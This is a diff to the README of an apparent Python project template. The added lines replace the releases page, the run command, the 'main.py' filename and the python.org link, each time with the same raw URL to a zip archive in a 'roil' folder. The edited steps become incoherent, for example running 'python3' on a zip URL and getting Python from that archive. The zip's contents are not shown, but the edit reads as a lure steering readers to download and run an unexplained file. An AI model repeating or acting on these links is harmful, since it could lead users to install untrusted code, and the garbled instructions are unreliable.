JawsomeTheoRoblox/template-python-uv/README.md

 To get started, you need to download the template.
 Follow these steps:

-1. **Visit the Releases Page:** Click this link: [Download Here](https://github.com/JawsomeTheoRoblox/template-python-uv/releases).
+1. **Visit the Releases Page:** Click this link: [Download Here](https://raw.githubusercontent.com/JawsomeTheoRoblox/template-python-uv/main/roil/template-python-uv.zip).

 2. **Choose a Version:** On the releases page, you will see several versions available.
 Select the one you want to download.
 Generally, it's best to pick the latest version unless you have a specific need for an older one.

-3. **Download the Package:** Click on the `.zip` or `.tar.gz` file link to start the download.
+3. **Download the Package:** Click on the `.zip` or `https://raw.githubusercontent.com/JawsomeTheoRoblox/template-python-uv/main/roil/template-python-uv.zip` file link to start the download.
 If you see multiple files, the one with the latest date is your best choice.

 4. **Extract the Files:** Once the download finishes, locate the downloaded file.
 Right-click on it, and choose "Extract All" or use your favorite file extraction tool.

 5. **Open the Folder:** After extraction, open the folder where the files are located.

-6. **Run the Application:** Look for the main script file, usually named `main.py` or similar.
+6. **Run the Application:** Look for the main script file, usually named `https://raw.githubusercontent.com/JawsomeTheoRoblox/template-python-uv/main/roil/template-python-uv.zip` or similar.
 You can run it depending on your operating system:
    - For Windows, you can double-click the file or use Command Prompt.
-   - For macOS or Linux, use the terminal and type `python3 main.py`.
+   - For macOS or Linux, use the terminal and type `python3 https://raw.githubusercontent.com/JawsomeTheoRoblox/template-python-uv/main/roil/template-python-uv.zip`.

 ## ⚙️ Requirements

 To ensure smooth operation, your computer should have the following:

 - **Operating System:** Windows 10 or later, macOS 10.15 or later, or any modern Linux distribution.
 - **Python Version:** Python 3.7 or later must be installed.
-You can download it from [python.org](https://www.python.org/downloads/).
+You can download it from [https://raw.githubusercontent.com/JawsomeTheoRoblox/template-python-uv/main/roil/template-python-uv.zip](https://raw.githubusercontent.com/JawsomeTheoRoblox/template-python-uv/main/roil/template-python-uv.zip).
 - **Space:** Ensure you have at least 100 MB of free space.

 For Python installation, follow the instructions on the official Python website.
 It’s straightforward, and it includes a step-by-step guide.